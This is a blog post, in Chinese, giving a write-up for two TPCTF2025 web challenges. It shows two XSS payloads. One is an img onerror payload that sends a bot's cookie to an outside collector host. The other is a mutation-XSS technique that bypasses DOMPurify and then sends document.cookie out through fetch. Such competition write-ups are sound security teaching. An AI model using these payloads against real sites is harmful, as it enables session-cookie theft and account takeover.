<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="TPCTF2025 Web 复现全解baby-layoutProblem本题给了两个接口，允许我们自定义 layout 然后能够自定义 &#123;&#123;content&#125;&#125; 内容。 Solution登录之后发现有一个网页和 bot 功能，疑似 xss，看到 dockerfile 里面 flag 放到 bot 的 cookie 里，大概是要把 bot 的 cookie 带出">
<meta property="og:type" content="article">
<meta property="og:title" content="TPCTF2025 Web 复现全解">
<meta property="og:url" content="http://blog.kamiya.run/2025/03/31/TPCTF2025Web/index.html">
<meta property="og:site_name" content="Kamiya 的小窝">
<meta property="og:description" content="TPCTF2025 Web 复现全解baby-layoutProblem本题给了两个接口，允许我们自定义 layout 然后能够自定义 &#123;&#123;content&#125;&#125; 内容。 Solution登录之后发现有一个网页和 bot 功能，疑似 xss，看到 dockerfile 里面 flag 放到 bot 的 cookie 里，大概是要把 bot 的 cookie 带出">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-03-31T14:01:28.000Z">
<meta property="article:modified_time" content="2025-03-31T14:30:40.935Z">
<meta property="article:author" content="Kamiya">
<meta property="article:tag" content="xctf">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>TPCTF2025 Web 复现全解</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/kamiya721">项目</a></li><!--
     --><!--
       --><li><a href="/link/">友链</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&text=TPCTF2025 Web 复现全解"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&is_video=false&description=TPCTF2025 Web 复现全解"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=TPCTF2025 Web 复现全解&body=Check out this article: http://blog.kamiya.run/2025/03/31/TPCTF2025Web/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&name=TPCTF2025 Web 复现全解&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&t=TPCTF2025 Web 复现全解"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TPCTF2025-Web-%E5%A4%8D%E7%8E%B0%E5%85%A8%E8%A7%A3"><span class="toc-number">1.</span> <span class="toc-text">TPCTF2025 Web 复现全解</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-layout"><span class="toc-number">1.1.</span> <span class="toc-text">baby-layout</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Problem"><span class="toc-number">1.1.1.</span> <span class="toc-text">Problem</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution"><span class="toc-number">1.1.2.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Safe-layout"><span class="toc-number">1.2.</span> <span class="toc-text">Safe-layout</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Problem-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">Problem</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-1"><span class="toc-number">1.2.2.</span> <span class="toc-text">Solution</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        TPCTF2025 Web 复现全解
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Kamiya</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-03-31T14:01:28.000Z" class="dt-published" itemprop="datePublished">2025-03-31</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/ctf/">ctf</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/web/" rel="tag">web</a>, <a class="p-category" href="/tags/writeup/" rel="tag">writeup</a>, <a class="p-category" href="/tags/xctf/" rel="tag">xctf</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="TPCTF2025-Web-复现全解"><a href="#TPCTF2025-Web-复现全解" class="headerlink" title="TPCTF2025 Web 复现全解"></a>TPCTF2025 Web 复现全解</h1><h2 id="baby-layout"><a href="#baby-layout" class="headerlink" title="baby-layout"></a>baby-layout</h2><h3 id="Problem"><a href="#Problem" class="headerlink" title="Problem"></a>Problem</h3><p>本题给了两个接口，允许我们自定义 layout 然后能够自定义 <code>&#123;&#123;content&#125;&#125;</code> 内容。</p>
<h3 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h3><p>登录之后发现有一个网页和 bot 功能，疑似 xss，看到 dockerfile 里面 flag 放到 bot 的 cookie 里，大概是要把 bot 的 cookie 带出来就算过了。</p>
<p>没有发现任何过滤，直接正常的使用 xss 来进行伪造。</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="attr">layout</span>:</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&#123;&#123;content&#125;&#125;</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">payload:</span></span><br><span class="line"><span class="language-xml">&quot; onerror=&quot;window.location.href=&#x27;http://xss.domain.com/index.php/?1=&#x27;+document.cookie</span></span><br></pre></td></tr></table></figure>

<p>回带 flag 就行。</p>
<h2 id="Safe-layout"><a href="#Safe-layout" class="headerlink" title="Safe-layout"></a>Safe-layout</h2><h3 id="Problem-1"><a href="#Problem-1" class="headerlink" title="Problem"></a>Problem</h3><p>在上题的基础上使用 <code>DomPurify</code> 进行了过滤。</p>
<h3 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h3><p>本题提出了一个对 layout 进行注入的过程中使用 <code>DomPurify</code> 进行标签过滤的绕过，本题禁止使用所有的标签属性。</p>
<p>注意这里使用的是 <code>DomPurify</code> 这样一个<strong>工具</strong>进行过滤操作，不妨去考虑 <code>DomPurify</code> 这个工具自身产生的漏洞。</p>
<p>当我们对 Dom Tree 进行解析的时候，我们有一个手法叫做 <strong>mXSS</strong>：当浏览器去解析我们的标签时会自动进行一系列的<strong>修复</strong>，尝试使 Dom Tree 处于标准形式，便于后续的解析。但正是这个修复的行为导致了我们标签结构的<strong>突变（mutation）</strong>。</p>
<p>对于不同的浏览器，标签修复有不同的行为，所以某些 mXSS 行为在某些浏览器上不起作用（Firefox 上某些 mXSS 就没有办法起作用）。</p>
<p>举个例子：</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">div</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">a</span> <span class="attr">alt</span>=<span class="string">&quot;&lt;/div&gt; &lt;img src onerror=&#x27;alert(111);&#x27;&gt;&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>这个时候 HTML 并不会分析 <code>alt</code> 标签的内容，他会解析成一个正常的文本，而不会将中间的 <code>&lt;img</code> 元素解析出来。</p>
<p>但是如果我们使用 <code>&lt;style&gt;</code> 元素那就是完全不一样的表现了，类似的例子：</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span></span><br><span class="line">  &lt;a alt=&quot;<span class="tag">&lt;/<span class="name">style</span>&gt;</span> <span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span> <span class="attr">onerror</span>=<span class="string">&#x27;alert(111);&#x27;</span>&gt;</span>&quot;</span><br><span class="line"><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>你能够明显感觉到上下两段 html 之间的差距，这个时候由于 <code>&lt;style&gt;</code> 元素的原因，html 认为嵌合在 <code>alt</code> 标签中的 <code>&lt;/style&gt;</code> 终止元素成为了自己的元素，从而将整个 <code>&lt;img</code> 元素表现成了正常的元素，从而我们可以进行注入操作。</p>
<p>但是本题中我们连 <code>alt</code> 这个标签都不可能存在，所以我们需要一个新的手法来进行注入。同样是 <code>&lt;style&gt;</code> 元素的利用，根据 <code>DomPurify</code> 的过滤规则，他中间会采用类似 <code>/&lt;[/\w]/</code> 的方式检查，从而我们的 <code>&lt;&#123;&#123;content&#125;&#125;</code> 并不会被检查，所以可以在 <code>&lt;style&gt;</code> 元素中注入一个未被转义的 <code>&lt;</code> 来方便我们后续的注入。</p>
<p>而后面我们只需要通过 <code>mXSS</code> 的特性通过展平操作来 <code>&lt;style&gt;</code>，然后再使用我们刚刚注入的恶意 <code>&lt;</code> 来进行注入就可以了。</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="language-css"></span></span><br><span class="line"><span class="language-css">  &#123;&#123;<span class="attribute">content</span>&#125;&#125;&lt;&#123;&#123;<span class="attribute">content</span>&#125;&#125; <span class="comment">/* 由于我们需要在 &lt;img 元素之前跳出 &lt;style&gt; 元素，所以需要在前面加入一个 &#123;&#123;content&#125;&#125; 来帮助我们通过突变特性弹出*/</span></span></span><br><span class="line"><span class="language-css"></span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">img src onerror=fetch(`domain.com/?flag=`+document.cookie) <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>后面的 <code>&lt;style&gt;</code> 帮助我们展平弹出，前面的 <code>img</code> 是我们的恶意注入代码。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/kamiya721">项目</a></li>
        
          <li><a href="/link/">友链</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TPCTF2025-Web-%E5%A4%8D%E7%8E%B0%E5%85%A8%E8%A7%A3"><span class="toc-number">1.</span> <span class="toc-text">TPCTF2025 Web 复现全解</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-layout"><span class="toc-number">1.1.</span> <span class="toc-text">baby-layout</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Problem"><span class="toc-number">1.1.1.</span> <span class="toc-text">Problem</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution"><span class="toc-number">1.1.2.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Safe-layout"><span class="toc-number">1.2.</span> <span class="toc-text">Safe-layout</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Problem-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">Problem</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-1"><span class="toc-number">1.2.2.</span> <span class="toc-text">Solution</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&text=TPCTF2025 Web 复现全解"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&is_video=false&description=TPCTF2025 Web 复现全解"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=TPCTF2025 Web 复现全解&body=Check out this article: http://blog.kamiya.run/2025/03/31/TPCTF2025Web/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&title=TPCTF2025 Web 复现全解"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&name=TPCTF2025 Web 复现全解&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://blog.kamiya.run/2025/03/31/TPCTF2025Web/&t=TPCTF2025 Web 复现全解"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025
    Kamiya
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/kamiya721">项目</a></li><!--
     --><!--
       --><li><a href="/link/">友链</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
